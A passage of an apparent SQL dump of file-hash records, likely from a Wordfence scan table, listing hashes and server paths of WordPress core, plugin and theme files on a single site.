0,0,'3dbbac9cde6089ada883c8f579d83ccba06ac53f','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3de106a8d053ad8a2ede439ad39c4ce9b3fa1707','/home/westonspirit.org.uk/public_html/wp-admin/export.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3deeca024a62a42688e12f7378461f5fbd4020fa','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3e0f387879f155ab13d172c83306f5fce66bb7d3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3e375be97b998878481bd80d6ce46f334eaadbe2','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/HSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3e3c3409800203518e1ff0de83de5601590790d6','/home/westonspirit.org.uk/public_html/wp-admin/my-sites.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3e4ae0f577f767d50d8ff487ad95f4fcda3fe5ba','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/reporters/theme.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3e63f9a58a322dac8376b30fd2c0aa2686ff592e','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3ea4e249d7c43ff8b87e7d3c65c75f8c72a4112b','/home/westonspirit.org.uk/public_html/wp-admin/user/menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3eb0399ac135a6e676193c0736af1fb149d68ffb','/home/westonspirit.org.uk/public_html/wp-includes/class.wp-scripts.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3ecbb703e7bc2ea05b8d1708e899e35954ffb054','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3ef8ac277fc33c3497cb02b60ed642d31696e57c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3f1c8c6573f2872e6975314d72598232226bb355','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3f43e3f6d4fb08f64ac07db9b7901d41289e37dd','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/SecretStream/State.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3f4a9a48648074b23e10c8c5b55c10d5ec604a42','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3f770d26f41731a0d5b6c8067aaa7cc469f71ab9','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/page-templates/templates/canvas.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3fbb0513b4b09223bda166a8aeca8259b6dbe676','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-plugins-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3ff8ca6f815ebc718473f760f9b0ea82331bcaa1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'3ffe81233958987f513c07c162ab4aa7fb91db68','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_wordfence_central.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'40047430dc92c7bdd0d3ee94c48552b57c6c6cb4','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/action.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'400d307d6c56173e12f66bc6fba4af1b3d49829b','/home/westonspirit.org.uk/public_html/wp-admin/options-head.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'401e255a6bd9e3a37b3367b2d5afc4546d506c06','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/content/content-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4020622d173491fd7c36685c91c7ea9baeab5391','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-admin-bar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'403806f8af9cc10314e87b3dc1519bfd46aac6af','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/compatibility/kit-library.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'404138368967f40ee8b8b24d2238a0e630a1ec2d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/fonts.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'40468faee2fbb53301ff74f7b3ad17d49448f5e1','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'40806b6a93e4a9b4e09bc0081b672d7029963196','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'40a8579b50a454c9cb74c93a09f2793d1bd99b6a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfHelperBin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'40d807f480cc6b48cf6f3fc56b48abe71ab4a947','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-widget-factory.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'40e6720c9cff3234115f6385a5cfe72e489835f9','/home/westonspirit.org.uk/public_html/wp-includes/PHPMailer/SMTP.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'40ea350da35229a97c1a5a5c499391dba49f96e3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/upgrade/upgrades.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'410ed9536bc9d3ac064c4dc79a9b5dff0d8fce50','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/.htaccess',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'412aff31e26014eb34c2e0ea29d7c582aa0182f7','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/footer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'417bf56a8dc694ecb8766f299973f3ce805f84b3','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-site-icon.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4180735a193c3ead7da0b76d11a71842fb071b52','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/status-detail.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'41b051eb88d652d9273614e0e1772ffe478391c6','/home/westonspirit.org.uk/public_html/wp-admin/includes/taxonomy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'41b663638ce3cd887d541dd4ba4b02613c85cd94','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-fatal-error-handler.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'41b72b868935948b505c68417255032b5df49ec5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/general/model.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'41c8f737c6fff184a18d3029f10487dcc9ff63eb','/home/westonspirit.org.uk/public_html/wp-includes/pomo/entry.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'41df20eda41138697b4179d5dcb0f0e8d620a881','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'423263b668113787110c076fb555aadf7444beb6','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/login.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'423fdf4fe0e23b7848aa0a49eec89b82f50b69a3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4250a4b143bf18675f73604a2042077880525da4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'426d15631948c5bb51d76b272dc0e306ebfbc717','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'426f9c7d6f4b657827b99f12b50106fe6fefe260','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'42873b79a0baaa07d49bd7537f8918379c5910aa','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/inc/plugin-frontend.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'42a54f6875ed698f4cdf7aff7d3e18082c747a9d','/home/westonspirit.org.uk/public_html/wp-includes/canonical.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'42c0e69c2e93194e8cef432f0636f42c02f7f4b1','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/import.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'42d5bdcf7dd3c0ebb7ee076364a719b0ab89e44a','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'42df103f72b27f7c8600a819332499b800ced228','/home/westonspirit.org.uk/public_html/wp-includes/kses.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'434e6f1f213d712f32a63c8c82cac5352023523b','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-xmlrpc-server.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'434e85d0557aa965de753b0ba0741b11c61e97fc','/home/westonspirit.org.uk/public_html/wp-admin/plugin-install.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'43713fc4ec10a30b47eb655a9d1f1039d6b2edb4','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/shapes.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'437ee73ebf164dc76b546267ff50438d2b7dd44e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'43aa81cef0185346d10262072ace3272034558a9','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'43c3ae857be3e210cbd1f5f7a614479a8bca9414','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'43d5dbaeabe81f49a4289c99f81bb2274b1e0e99','/home/westonspirit.org.uk/public_html/wp-content/plugins/hello.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'43e6d1aaeb8c90b573c9c2c0621799fdddfc0c32','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfJWT.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'441380176ac7045f54bc3083663b64c324e5ea85','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/304.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4422709571dbb14ab1bf51519ca55cb88e64ff1c','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'442a6982c9b01e31a7858f1fa0bcfa4396c60fdf','/home/westonspirit.org.uk/public_html/wp-admin/credits.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'44464cf5f2eff31cdf5133e07631d4ea8b35108b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4466a6d2e1b0b1be217d0ef685896d1f0d99a92e','/home/westonspirit.org.uk/public_html/wp-admin/options-permalink.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'44854826d52fbbe734876e8ea4d38a17a7059dbd','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/fileio/nginx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'44acfb451f936fb27f47e8a53db3efda89407e76','/home/westonspirit.org.uk/public_html/wp-includes/media.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'44b61bd9ad9ab2b4468ab630213de2c9ab736f59','/home/westonspirit.org.uk/public_html/wp-admin/includes/update-core.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'44d52b073420c498e57853290974d7198a8a3ca7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'451b1f082f7408ada64a54fbf78e186def1ec503','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'45275b5cd491cc4e7c9799f198569bc40d7e1779','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'455139142b3ed1f33cd0c936dc47846407148fd6','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-site.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'456622424c5303e1121f39d9c427e778c4f315fa','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'45698158a7b2a37a8d50f2b52be0f0dbab0186f5','/home/westonspirit.org.uk/public_html/wp-includes/default-filters.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'45992b5eba2a004d94691548ba8ffb4f2b9696d7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4605fa01310230be1356b0701a7c383846b7477b','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/wigets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'463b2d8d9a5d68a7efc135f80165e615629aa889','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'466e4c73f35f02ef613625d6d5a8317fe7134564','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/file-types/json.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'469a1a8eeac01fae61e680274feaa6667f5ca43c','/home/westonspirit.org.uk/public_html/wp-includes/random_compat/error_polyfill.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'46bb2f14606a42afd5990ab39f79c3ffd6cc423f','/home/westonspirit.org.uk/public_html/wp-load.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'46c633448ac68e1fbefd7d46cdbdb903c89708a9','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/dynamic-tags/tag.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'46f4bd940314d07a3bc63648f75ec4b3774b904c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/loggers/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'46f62fa250d906a2c77bf9c925483c72dd375f99','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4707faa1a8bd85304bb9183aea452c288bfc1954','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-embed.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'478d81cf0879f57a185536e1a2468fba9409c1a7','/home/westonspirit.org.uk/public_html/wp-includes/random_compat/random_bytes_com_dotnet.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4795cc3d7c6529f07db927d3ef448c7a1cf7e8cb','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'47a7eacecab6d677d9f482fae96173386664e7df','/home/westonspirit.org.uk/public_html/wp-includes/taxonomy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'47c3b667ee43045064aa7536d22e2fc6597e2c2a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/app.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'481547d6c421e2209a261e8a1cfe57bbf615d5c5','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-media-image.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'483498f6549fa4915db928f03869e53ed7218616','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/models/.htaccess',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'48a2e3c70b013524558459e828327cd631e8ed84','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/disable-gutenberg.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'48b8363d61d22fbced1a78f12ccf7d399096e726','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'48cf62cb4241e3862ce83e313cc2169079ec06a2','/home/westonspirit.org.uk/public_html/wp-includes/class-simplepie.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'48e02dd2c537137b9839299a47d2bb0418511ff0','/home/westonspirit.org.uk/public_html/wp-includes/pluggable-deprecated.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4911753b35dc3268bea41f7d59ab41d5c0091acc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'49670982277e0fffe918e79b6c9bf4ef1ff1cf40','/home/westonspirit.org.uk/public_html/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4976525cefea05acef36197b13068074ceb39d2d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'497b87a5f287d30c1deb09a3ba899f377ff1b41b','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/415.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4982064b78c91cf2616ba3503f97e5721381b54b','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-roles.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'49afec96b42086d7e94e22b3be5277ead15c42e3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'49b132a40cda4ccc5f753097c62ef96433f5f777','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4a04914b8dbce1f8de004aa04c2d5933bdabf57f','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-users-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4a0f7a6c1275c957af38b58a8ea88f36b2f0f33d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfLockedOut.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4a3a83d62d7d2cd14ef7e5798755bf05d1465c26','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/permalinks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4a433da2940d8272fe5dd12d662dec3f00c6d49a','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menu-item-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4a57c551aff0e29c924e2df2888d4633567b127e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/autoload.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4a648790a8aa0480bbf0f143e81cba152309e2bf','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Caption.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4a7d61d6e6a622fd0d460ec460a45e69af852382','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4ae0d100f1d62dd4392a4b5aaecd736ad03df501','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/wp-cli/command.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4ae5d50bec26597104095876d57dffd42c545339','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/responsive-bar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4afa24e9fc0eaeea036aa68b79e9f15a8a727718','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4b2bb616f43bf600d3b119ba12d386171c4999e1','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-partial.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4b42bc77120b9841837fa5a1d2ef669d0abc65da','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/blocking/block-list.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4b6c6ce970cd8b11d0b4d5e5da1a21f11f0bea64','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/redirection-settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4b7806da65195715fd8c361be321c86f29cff22c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/page/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4b7b2ea960a458390c013f2d8d5d55ed4ed02f80','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/base/skin-base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4b948c4da2d0f72d3cd30d6185307655eb06ef8e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4c0a5603b962886d369223ed5017281303da65ee','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/gutenberg/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4c41a0aa93a9a3307aa54c7c12bf70812985c986','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/footer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4c46f478f17d751eeac3462c828be3e28ca82489','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-server.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4c7a21fb65d067b295249c13bb5a71b324926890','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/assets/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4cbf6ed0516659e79f50eae87c8b0fd96a98381b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4cc1fbe2948c6f6bc9d16330f316970725f66822','/home/westonspirit.org.uk/public_html/wp-admin/nav-menus.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4cf366c1b5f372fef180a53926b8166f2cdc67a0','/home/westonspirit.org.uk/public_html/wp-includes/random_compat/random_bytes_mcrypt.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4d3b61e9c061184d0cc0089a405a6166e0b6ea9b','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/content-cover.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4d473812ad0758f87734bb13a089296b8b26f489','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/url/url-request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4d47a94635c82de130d745af5071a1222f0dfd2b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4d664b7089c7763c24cbabd47e77055aea37f461','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4d8d467673bff7fbc6bef16ac5a8585489f8004a','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-theme-upgrader-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4d926f6df9cd05405f27b27c672092387750056e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4db676e60a64de7fb04b89b492a4bef52dcec891','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/400.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4dc80110d4989d0b9f00904e041f555404c17cf0','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Content/Type/Sniffer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4de2c65d4607e57b8b5389ffa1023566351730db','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4de5ce5f2f740bbf544fb708a027893c32b4afde','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/editor/data/globals/endpoints/colors.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4e22062ca53d0589e580e40c851cc64d276c8e72','/home/westonspirit.org.uk/public_html/wp-includes/feed-rss2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4e59821465e822a17d46332b34052e193a359d28','/home/westonspirit.org.uk/public_html/wp-includes/class-walker-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4e5b0a613e0abf98e1c862c0a781752987cb50ce','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/500.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4e91da1fd42cef1a6c7cbefb11ec6a1490f0e375','/home/westonspirit.org.uk/public_html/wp-includes/class.wp-styles.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4eadc627b561040b4ad4fd13ae8119ca2f52e092','/home/westonspirit.org.uk/public_html/wp-includes/blocks/shortcode.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4ee9d233ed5f72f9883bb17d3c81afab887257c6','/home/westonspirit.org.uk/public_html/wp-includes/class-phpass.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'4ef8a279c7a893c23da208fa9448d6f1e4c3b57b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib